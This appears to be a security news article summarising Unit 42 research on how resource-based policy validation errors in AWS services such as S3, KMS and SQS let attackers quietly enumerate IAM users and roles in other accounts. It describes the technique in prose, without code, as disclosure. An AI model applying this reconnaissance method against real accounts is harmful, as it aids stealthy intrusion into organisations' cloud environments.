Attackers can abuse APIs to leak user identities and Access Management info.
Unit 42 researchers have discovered a class of Amazon Web Services (AWS) APIs that are vulnerable to abuse. The abuse by attackers could leak the AWS Identity and Access Management (IAM) users and roles in arbitrary accounts.
Amazon Simple Storage Service (S3), Amazon Key Management Service (KMS) and Amazon Simple Queue Service (SQS) are among the AWS services that attackers can abuse this way.
How attackers can use the exploit
It starts when a malicious actor may obtain the roster of an account. Once the attacker has the roster, they can learn the organization’s internal structure and launch targeted attacks against individuals.
In a recent Red Team exercise, Unit 42 researchers compromised a customer’s cloud account with thousands of workloads. They did this using a misconfigured IAM role identified by this technique.
The root cause of the issue is that the AWS backend proactively validates all the resource-based policies attached to resources such as Amazon Simple Storage Service (S3) buckets and customer-managed keys.
Resource-based policies usually include a Principal field that specifies the identities (users or roles) allowed to access the resource. If the policy contains a nonexistent identity, the API call that creates or updates the policy will fail with an error message.
Resource-based policies provide an entry point
The error message feature is very convenient. However, attackers can abuse this feature to check whether an identity exists in an AWS account. Hackers can invoke these APIs repeatedly, using different principals to identify the users and roles in a targeted account.
To make matters worse, the targeted account can’t observe this user and role enumeration. This is because the API logs and error messages only appear in the account the hackers used to manipulate the resource policies.
The “stealthy” property of the hacking technique makes detection and prevention difficult, according to Unit 42. Attackers can take as much time as they need to perform reconnaissance on random or targeted AWS accounts without worrying that an admin will notice.